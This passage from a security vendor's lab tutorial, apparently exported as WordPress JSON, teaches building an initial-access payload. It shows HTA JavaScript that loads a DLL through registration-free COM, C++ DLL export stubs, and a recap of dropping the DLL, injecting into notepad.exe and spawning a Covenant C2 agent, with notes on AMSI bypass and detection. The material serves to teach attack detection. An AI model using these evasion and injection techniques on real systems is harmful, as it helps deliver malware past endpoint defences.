name=&quot;test.dll&quot;&gt; &lt;comClass description=&quot;MyCOMObject Class&quot; clsid=&quot;{67E11FF1-C068-4C48-A1F5-69A882E0E99A}&quot; threadingModel=&quot;Both&quot; progid=&quot;MyCOMObject&quot;\/&gt;&lt;\/file&gt;&lt;\/assembly&gt;&#x27;\n\n\/\/ this will look for our COM DLL in the path noted above, the file name is indicated in the manifest\nshell.Environment(&#x27;Process&#x27;)(&#x27;TMP&#x27;) = path;\n\nvar actCtx = new ActiveXObject(&quot;Microsoft.Windows.ActCtx&quot;);\nactCtx.ManifestText = manifestXML;\n\ntry {\nvar dwx = actCtx.CreateObject(&quot;MyCOMObject&quot;);\nalert();\n} catch (e) { }<\/code><\/pre>\n<p>To make this work for us, we also need to modify our DLL to export specific functions, necessary for the reg-free COM activation. More specifically, the following code should be added into our DLL:<\/p>\n<pre><code class=\"language-bash\">\/\/ build and place in directory specified in the script.js file\n\/\/ need to export DllCanUnloadNow, DllRegisterServer, DllUnregisterServer, DllGetClassObject\n#include &lt;Windows.h&gt;\n#include &lt;comutil.h&gt; \/\/ #include for _bstr_t\n#include &lt;string&gt;\n#include &quot;Data.h&quot;\n\nDWORD MyThread();\nUINT g_uThreadFinished;\nextern UINT g_uThreadFinished;\n\nBOOL APIENTRY DllMain(HMODULE hModule,DWORD ul_reason_for_call,LPVOID lpReserved)\n{\nif (ul_reason_for_call == DLL_PROCESS_ATTACH)\n{\ng_uThreadFinished = 0;\n}\nreturn TRUE;\n}\n\nSTDAPI DllCanUnloadNow(void)\n{\n\/\/ Ensure our thread can finish before we&#x27;re unloaded\ndo\n{\nSleep(1);\n} while (g_uThreadFinished == 0);\n\nreturn S_OK;\n}\n\nSTDAPI DllRegisterServer(void)\n{\nreturn S_OK;\n}\n\nSTDAPI DllUnregisterServer(void)\n{\nreturn S_OK;\n}\n\nSTDAPI DllGetClassObject(REFCLSID rclsid, REFIID riid, LPVOID* ppv)\n{\nCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)MyThread, NULL, 0, NULL);\nreturn CLASS_E_CLASSNOTAVAILABLE;\n}<\/code><\/pre>\n<p>To recap what is happening, our HTA will do the following:<\/p>\n<ul>\n<li>Drop a DLL in a folder we specify, something like %TEMP or %APPDATA%<\/li>\n<li>The HTA will define an XML manifest, that will be dropped in the same folder as our DLL<\/li>\n<li>Using registration free COM, we will load the DLL into the mshta.exe process<\/li>\n<li>The DLL will perform process injection against notepad.exe<\/li>\n<li>Notepad will spawn a Covenant&#x27;s Grunt<\/li>\n<\/ul>\n<p>If we try to execute our HTA and monitor the process activity using tools such as <a href=\"https:\/\/docs.microsoft.com\/en-us\/sysinternals\/downloads\/procmon\" target=\"_blank\" rel=\"noopener\">ProcMon<\/a>, it would be possible to see a &quot;Load Image&quot; event using our DLL, and we should obtain an active Grunt on the host:<\/p>\n<figure><img decoding=\"async\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/image-20210325154234265.png.webp\" alt=\"\" class=\"wp-component-image\" \/><\/figure>\n<h2>Conclusions<\/h2>\n<p>Let&#x27;s take a minute, we&#x27;ve come a long way!<\/p>\n<p>In this lab, we&#x27;ve observed AMSI doing its thing against our default Covenant Grunt shellcode. We&#x27;ve used the Donut project to introduce an AMSI bypass to bypass this. From here, we&#x27;ve embedded our shellcode in a DLL that spawns a Notepad process and uses the VirtualAllocEx-&gt;WriteProcessMemory-&gt;CreateRemoteThread pattern to inject our Grunt.<\/p>\n<p>We&#x27;ve used FireEye&#x27;s CAPA to give us some idea of how glaringly obvious our malicious payload is, highlighting the many &#x27;opsec fails&#x27; that static analysis quickly picks up. We&#x27;ve even seen how Sysmon includes a specific event ID just for our CreateRemoteThread injection technique!<\/p>\n<p>To stand us a better chance of delivering our payload into a target environment, we&#x27;ve embedded the base64 encoded DLL into an HTA file that subsequently decodes the encoded blob in memory and drops it to disk (highlighting another detection opportunity using &#x27;file creation&#x27; events). To execute our DLL from the HTA, we used Leo Lobeek&#x27;s research into Registration Free COM. Including a reference to our Grunt-packed DLL in the HTA file&#x27;s manifest.<\/p>\n<p>We&#x27;ve got plenty still to do if we want our payload to have a better chance of bypassing security controls and executing successfully. Join us in the next guide as we implement API unhooking and patch ETW <a href=\"https:\/\/labs.withsecure.com\/blog\/attack-detection-fundamentals-2021-windows-lab-2\/\" target=\"_blank\" rel=\"noopener\">here<\/a>!<\/p>\n<\/div>\n<section\n    class=\"wp-block-sharing-icons edwp-block wp-block-sharing-icons--disable-border wp-block-sharing-icons--disable-container wp-block-two-column-block__share wp-block-two-column-block__mobile-after-right wp-block-two-column-block__share wp-block-two-column-block__mobile-after-right\"\n    >\n    <div class=\"wp-block-sharing-icons__container\">\n        <div class=\"wp-block-sharing-icons__inner\">\n                            <p class=\"wp-block-sharing-icons__title fade-in\">\n                    Share this story                <\/p>\n                        <div class=\"wp-component-socials wp-component-socials--dark-mode\">\n    \n            <a href=\"https:\/\/www.linkedin.com\/shareArticle?mini=true&#038;url=https:\/\/www.withsecure.com\/en\/resources-hub\/w-labs\/attack-detection-fundamentals-2021-windows-lab-1\/&#038;title=Attack%20Detection%20Fundamentals%202021:%20Windows%20&#8211;%20Lab%20#1\" target=\"_blank\" rel=\"noreferer noopener\" class=\"wp-component-socials__link\" title=\"Share on Linkedin\">\n            <svg class='edwp-icon edwp-icon--xlg js-icon ' aria-hidden='true'>\n                <use xlink:href='#linkedin'><\/use>\n            <\/svg>        <\/a>\n    \n            <a href=\"http:\/\/x.com\/share?text=Attack Detection Fundamentals 2021: Windows &#8211; Lab #1&#038;url=https:\/\/www.withsecure.com\/en\/resources-hub\/w-labs\/attack-detection-fundamentals-2021-windows-lab-1\/\" target=\"_blank\" rel=\"noreferer noopener\" class=\"wp-component-socials__link wp-component-socials__link--twitter\" title=\"Share on Twitter\">\n            <svg class='edwp-icon edwp-icon--xlg js-icon ' aria-hidden='true'>\n                <use xlink:href='#x'><\/use>\n            <\/svg>        <\/a>\n    \n    \n    <\/div>\n        <\/div>\n    <\/div>\n<\/section>\n                <\/div>\n                        <\/div>\n<\/section>\n\n\n<section\n    class=\"wp-block-cta-banner edwp-block js-wp-block-cta-banner wp-block-cta-banner--style-icon wp-block-cta-banner--no-image layout--spacing-xxxl-top layout--spacing-xxxl-bottom\"\n    >\n    <div class=\"wp-block-cta-banner__container\">\n        <div class=\"wp-block-cta-banner__box row-load\">\n            <div class=\"wp-component-content wp-component-content--help-text wp-component-content--dark wp-block-cta-banner__content\">\n                        <div class=\"wp-component-content__inner\">\n                <h2 class=\"wp-component-heading text--h2 wp-component-heading--dark wp-component-content__title\">\n    What <span class=\"blue-text\">next?<\/span><\/h2>                                    <div class=\"wp-component-content__content wysiwyg wysiwyg--dark\">\n                        <div class=\"wp-component-paragraph wp-component-paragraph--dark\">\n    <p class=\"text--p-medium\">Discover WithSecure\u2122 Elements Exposure Management.<br \/>\n&#8211; No credit card required. No obligations.No complexity.<\/p>\n<\/div>\n                    <\/div>\n                            <\/div>\n                            <div class=\"wp-component-content__buttons\">\n                <a class=\"wp-component-button btn btn--primary btn--dark\" href=\"https:\/\/www.withsecure.com\/en\/contact-us\/\">Contact us<\/a>            <\/div>\n                <\/div>                    <\/div>\n    <\/div>\n<\/section>\n\n\n\n\n<section\n    class=\"wp-block-cards edwp-block wp-block-cards--col-3 js-wp-block-cards wp-block-cards--show-overflow wp-block-cards--auto-slides-per-view layout--spacing-xxxl-top layout--spacing-xxxl-bottom\"\n    >\n    <div class=\"wp-block-cards__container\">\n        <div class=\"wp-component-content wp-component-content--default wp-block-cards__content\">\n            <h2 class=\"wp-component-heading text--h2 wp-component-content__title\">\n    Related <span class=\"blue-text\">Labs content<\/span><\/h2>                    <div class=\"wp-component-content__inner\">\n                                    <div class=\"wp-component-content__content wysiwyg\">\n                        <div class=\"wp-component-paragraph \">\n    <p class=\"text--p-medium\"><span data-teams=\"true\">Find related content relating to this topic.<\/span><\/p>\n<\/div>\n                    <\/div>\n                                                            <\/div>\n                <\/div>                            <div\n                class=\"swiper wp-block-cards__swiper js-wp-block-cards-swiper\"\n                data-slides-per-view-desktop=\"auto\"\n                data-slides-per-view-tablet=\"auto\"\n                data-slides-per-view-mobile=\"auto\"\n            >\n                <div class=\"swiper-wrapper wp-block-cards__swiper-wrapper row-load\">\n                                            <div class=\"swiper-slide wp-block-cards__slide\">\n                            <div class=\"wp-component-card-insight wp-block-cards__card wp-component-card-insight--highlighted\">\n    <div class=\"wp-component-card-insight__image-wrapper\">\n        <img loading=\"lazy\" decoding=\"async\" width=\"618\" height=\"440\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/placeholder.jpg.webp\" class=\"wp-component-card-insight__image\" alt=\"\" srcset=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/placeholder.jpg.webp 618w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/placeholder-300x214.jpg.webp 300w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/placeholder-447x318.jpg.webp 447w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/placeholder-205x146.jpg.webp 205w\" sizes=\"auto, (max-width: 618px) 100vw, 618px\" \/>                    <p class=\"wp-component-card-insight__content-type\">W\/Labs<\/p>\n            <\/div>\n    <div class=\"wp-component-card-insight__content\">\n                    <div class=\"wp-component-card-insight__meta\">\n                <div class=\"wp-component-card-insight__categories\">\n                                            <span class=\"wp-component-card-insight__category\">AI security<\/span>\n                                            <span class=\"wp-component-card-insight__category\">Software Protection<\/span>\n                                            <span class=\"wp-component-card-insight__category\">Threat intelligence<\/span>\n                                    <\/div>\n            <\/div>\n                            <h3 class=\"wp-component-card-insight__title\">GREYVIBE: A Russia-nexus group leveraging AI across state-aligned operations<\/h3>\n                                    <p class=\"wp-component-card-insight__read-time\">15<\/p>\n                                    <div class=\"wp-component-card-insight__button-wrapper\">\n                <a class=\"wp-component-button btn btn--primary btn--dark wp-component-card-insight__button btn--small\" href=\"https:\/\/www.withsecure.com\/en\/resources-hub\/w-labs\/greyvibe\/\">Read more<\/a>            <\/div>\n            <\/div>\n<\/div>                        <\/div>\n                                            <div class=\"swiper-slide wp-block-cards__slide\">\n                            <div class=\"wp-component-card-insight wp-block-cards__card\">\n    <div class=\"wp-component-card-insight__image-wrapper\">\n        <img loading=\"lazy\" decoding=\"async\" width=\"618\" height=\"440\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/placeholder.jpg.webp\" class=\"wp-component-card-insight__image\" alt=\"\" srcset=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/placeholder.jpg.webp 618w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/placeholder-300x214.jpg.webp 300w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/placeholder-447x318.jpg.webp 447w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/placeholder-205x146.jpg.webp 205w\" sizes=\"auto, (max-width: 618px) 100vw, 618px\" \/>                    <p class=\"wp-component-card-insight__content-type\">W\/Labs<\/p>\n            <\/div>\n    <div class=\"wp-component-card-insight__content\">\n                            <h3 class=\"wp-component-card-insight__title\">WithSecure uncovers Russia-nexus threat group using AI to target Ukraine and European organisations<\/h3>\n                                                    <div class=\"wp-component-card-insight__button-wrapper\">\n                <a class=\"wp-component-button btn btn--primary wp-component-card-insight__button btn--small\" href=\"https:\/\/www.withsecure.com\/en\/resources-hub\/w-labs\/10919\/\">Read more<\/a>            <\/div>\n            <\/div>\n<\/div>                        <\/div>\n                                            <div class=\"swiper-slide wp-block-cards__slide\">\n                            <div class=\"wp-component-card-insight wp-block-cards__card\">\n    <div class=\"wp-component-card-insight__image-wrapper\">\n        <img loading=\"lazy\" decoding=\"async\" width=\"1200\" height=\"800\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/ws_labs_research.jpg.webp\" class=\"wp-component-card-insight__image\" alt=\"\" srcset=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/ws_labs_research.jpg.webp 1200w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/ws_labs_research-300x200.jpg.webp 300w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/ws_labs_research-1024x683.jpg.webp 1024w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/ws_labs_research-768x512.jpg.webp 768w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/ws_labs_research-447x298.jpg.webp 447w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/ws_labs_research-219x146.jpg.webp 219w\" sizes=\"auto, (max-width: 1200px) 100vw, 1200px\" \/>                    <p class=\"wp-component-card-insight__content-type\">W\/Labs<\/p>\n            <\/div>\n    <div class=\"wp-component-card-insight__content\">\n                    <div class=\"wp-component-card-insight__meta\">\n                <div class=\"wp-component-card-insight__categories\">\n                                            <span class=\"wp-component-card-insight__category\">Attack Detection<\/span>\n                                            <span class=\"wp-component-card-insight__category\">Software Protection<\/span>\n                                            <span class=\"wp-component-card-insight__category\">Threat intelligence<\/span>\n                                    <\/div>\n            <\/div>\n                            <h3 class=\"wp-component-card-insight__title\">DarkGate Rises: New version of DarkGate malware hunts like a Duck but bites like a RAT<\/h3>\n                                            <p class=\"wp-component-card-insight__desc\">Source: https:\/\/labs.withsecure.com\/publications\/darkgate-rises<\/p>\n                            <div class=\"wp-component-card-insight__button-wrapper\">\n                <a class=\"wp-component-button btn btn--primary wp-component-card-insight__button btn--small\" href=\"https:\/\/www.withsecure.com\/en\/resources-hub\/w-labs\/darkgate-rises\/\">Read more<\/a>            <\/div>\n            <\/div>\n<\/div>                        <\/div>\n                                    <\/div>\n                <div class=\"wp-block-cards__nav fade-in\">\n                    <div class=\"wp-block-cards__pagination js-wp-block-cards-pagination\">\n                    <\/div>\n                    <div class=\"wp-block-cards__nav-arrow js-wp-block-cards-nav-prev\">\n                        <svg class='edwp-icon edwp-icon--reg js-icon ' aria-hidden='true'>\n                <use xlink:href='#chevron'><\/use>\n            <\/svg>                    <\/div>\n                    <div class=\"wp-block-cards__nav-arrow js-wp-block-cards-nav-next\">\n                        <svg class='edwp-icon edwp-icon--reg js-icon ' aria-hidden='true'>\n                <use xlink:href='#chevron'><\/use>\n            <\/svg>                    <\/div>\n                <\/div>\n            <\/div>\n                                    <\/div>\n<\/section>\n","protected":false},"excerpt":{"rendered":"<p>One of the core concepts of the first workshop was &#8220;Defense Evasion&#8221; geared towards &#8220;Initial Access&#8221;. In this lab, we are going to build an initial access payload able to evade the most common endpoint protection mechanisms.<\/p>\n","protected":false},"author":3,"featured_media":8858,"template":"","categories":[240,271,231],"labs_content_type":[296],"class_list":["post-7736","lab_item","type-lab_item","status-publish","has-post-thumbnail","hentry","category-attack-detection","category-offensive-security","category-software-protection"],"acf":[],"card":"<div class=\"wp-component-card-insight js-card-link wp-component-card-insight--highlighted\">\n    <div class=\"wp-component-card-insight__image-wrapper\">\n        <img width=\"1200\" height=\"800\" src=\"https:\/\/www.withsecure.com\/wp-content\/uploads\/2026\/05\/ws_labs_research.jpg\" class=\"wp-component-card-insight__image\" alt=\"\" decoding=\"async\" loading=\"lazy\" srcset=\"https:\/\/www.withsecure.com\/wp-content\/uploads\/2026\/05\/ws_labs_research.jpg 1200w, https:\/\/www.withsecure.com\/wp-content\/uploads\/2026\/05\/ws_labs_research-300x200.jpg 300w, https:\/\/www.withsecure.com\/wp-content\/uploads\/2026\/05\/ws_labs_research-1024x683.jpg 1024w, https:\/\/www.withsecure.com\/wp-content\/uploads\/2026\/05\/ws_labs_research-768x512.jpg 768w, https:\/\/www.withsecure.com\/wp-content\/uploads\/2026\/05\/ws_labs_research-447x298.jpg 447w, https:\/\/www.withsecure.com\/wp-content\/uploads\/2026\/05\/ws_labs_research-219x146.jpg 219w\" sizes=\"auto, (max-width: 1200px) 100vw, 1200px\" \/>                    <p class=\"wp-component-card-insight__content-type\">W\/Labs<\/p>\n            <\/div>\n    <div class=\"wp-component-card-insight__content\">\n                    <div class=\"wp-component-card-insight__meta\">\n                <div class=\"wp-component-card-insight__categories\">\n                                            <span class=\"wp-component-card-insight__category\">Attack Detection<\/span>\n                                            <span class=\"wp-component-card-insight__category\">Offensive security<\/span>\n                                            <span class=\"wp-component-card-insight__category\">Software Protection<\/span>\n                                    <\/div>\n            <\/div>\n                            <h3 class=\"wp-component-card-insight__title\">Attack Detection Fundamentals 2021: Windows &#8211; Lab #1<\/h3>\n                                            <p class=\"wp-component-card-insight__desc\">One of the core concepts of the first workshop was &quot;Defense Evasion&quot; geared towards &quot;Initial Access&quot;. In this lab, we are going to build an initial access payload able to evade the most common endpoint protection mechanisms.<\/p>\n                            <div class=\"wp-component-card-insight__button-wrapper\">\n                <a class=\"wp-component-button btn btn--primary btn--dark wp-component-card-insight__button btn--small\" href=\"https:\/\/www.withsecure.com\/en\/resources-hub\/w-labs\/attack-detection-fundamentals-2021-windows-lab-1\/\">Read more<\/a>            <\/div>\n            <\/div>\n<\/div>","_links":{"self":[{"href":"https:\/\/www.withsecure.com\/en\/wp-json\/wp\/v2\/lab_item\/7736","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.withsecure.com\/en\/wp-json\/wp\/v2\/lab_item"}],"about":[{"href":"https:\/\/www.withsecure.com\/en\/wp-json\/wp\/v2\/types\/lab_item"}],"author":[{"embeddable":true,"href":"https:\/\/www.withsecure.com\/en\/wp-json\/wp\/v2\/users\/3"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.withsecure.com\/en\/wp-json\/wp\/v2\/media\/8858"}],"wp:attachment":[{"href":"https:\/\/www.withsecure.com\/en\/wp-json\/wp\/v2\/media?parent=7736"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.withsecure.com\/en\/wp-json\/wp\/v2\/categories?post=7736"},{"taxonomy":"labs_content_type","embeddable":true,"href":"https:\/\/www.withsecure.com\/en\/wp-json\/wp\/v2\/labs_content_type?post=7736"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}